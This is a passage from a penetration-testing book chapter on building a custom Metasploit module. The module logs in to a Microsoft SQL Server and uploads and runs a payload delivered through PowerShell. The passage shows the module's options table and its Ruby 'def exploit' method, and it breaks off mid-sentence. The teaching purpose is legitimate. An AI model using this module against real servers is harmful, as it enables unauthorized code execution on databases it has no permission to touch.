Building Your Own Module
Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASSWORD                        no        The password for the specified username
   RHOST                           yes       The target address
   RPORT          1433             yes       The target port
   USERNAME       sa               no        The username to authenticate as
   UsePowerShell  true             no        Use PowerShell as payload delivery method instead

Recall from Chapter 5 that the show options command will display any new options that have been added to an exploit. After we set these options, they will be stored within Metasploit as valid options.

Now we’ll finalize the mssql_powershell.rb file, which we have been editing since the beginning of this chapter, before we edit mssql.rb (which will be explained shortly).

When you examine the exploits in the modules directory inside Metasploit (modules/exploits, modules/auxiliary/, and so on), you’ll notice that most of them have the same overall structure (def exploit as an example). Remember always to comment your code to give other developers an idea of what it’s doing! In the following listing, we first introduce our def exploit line, which defines what we’ll be doing in our exploit. We’ll frame our exploit the same way as the other modules and add a few new sections, as explained next:

  def exploit

    # if u/n and p/w didn't work throw error
    if (not mssql_login_datastore)
      print_status("Invalid SQL Server credentials")
      return
    end

    # Use powershell method for payload delivery
    if (datastore['UsePowerShell'])
      powershell_upload_exec(Msf::Util::EXE.to_win32pe(framework, payload.encoded))
    end

    # Hand off to the payload handler, then close the MSSQL connection
    handler
    disconnect
  end
end  # closes the module's class definition, begun earlier in mssql_powershell.rb

The module first checks to see if we are logged in. If we aren’t logged in, the error message "Invalid SQL Server credentials" is displayed. The UsePowerShell method is used to call the function powershell_upload_exec, which will automatically create a Metasploit-based payload that we specify